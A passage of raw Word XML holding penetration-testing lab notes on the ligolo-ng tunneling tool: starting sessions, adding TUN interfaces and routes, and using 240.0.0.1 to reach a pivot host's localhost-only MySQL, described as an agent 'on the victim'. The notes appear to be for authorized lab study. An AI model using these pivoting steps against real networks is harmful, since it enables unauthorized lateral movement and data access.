                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what correct output looks like</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view network sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows all connected agents (sessions) to your proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000070D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use your arrow keys to select the session you want</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">begin tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000710">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000711">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starts the actual tunnel for a selected session.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000716">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000717">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure Ligolo is "UP" and not "DOWN"</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000071F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure Ligolo is "UP" and not "DOWN"</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6sxfx249gnfl" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000722">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_18jswm9p09m5" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to set up VPN-like Experience</w:t>
      </w:r>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The only flaw of this is that we can't access the pivot/target machine as localhost. If you need that (as we needed in the Secura Challenge Lab), then look at the local port forward section, which does exactly that. </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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000726">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add &lt;subnet&gt;/24 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000727">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ add a new route to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subnet&gt;/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → target subnet you want to reach through the tunnel (example: 10.10.0.0/24).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dev ligolo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → use the ligolo TUN interface to send traffic to that subnet.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view routes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip route list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000072D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="499"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists all current routes on your machine, including the new ligolo one.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view ip route:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000730">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link show</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000733">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000734">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_noiv5gbjw92h" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to local port forward (access target machine as local host)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000735">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the guide I used (chatGPT didn't work)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000736">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId176">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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The target machine only allowed mysql access if it was accessed locally via 127.0.0.1.</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Basically, you have to use the 240.0.0.1 subnet. </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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think this only works if you use a different pivot or if you have two agent.exe running on the same pivot. Venkat confirmed it works with two different pivots as long as you create a new interface. This is because one agent.exe can only handle one session at a time.</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Make a new interface and start it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000073F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000740">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo2 up</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Add a route to this interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000743">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add 240.0.0.1/32 dev ligolo2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000744">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000745">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000746">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on Kali terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000748">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This says "If I ever try to send packets to 240.0.0.1, don’t send it to the real network — instead send it into the ligolo interface."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000749">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo’s proxy then intercepts that traffic and routes it across the tunnel to the agent on the victim, where it is run locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you've already run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the ligolo console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000074B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="575"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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Then, if you want to forward stuff from your Kali to be run by the target machine, just specify IP 240.0.0.1</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">240.0.0.1 will point to whatever machine Ligolo-ng has an active tunnel on.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -h 240.0.0.1 -u root -p --skip-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command was sent to target machine, which ran the command locally, allowing access to mysql. It was like if I ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql -h 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine</w:t>
      </w:r>
    </w:p>
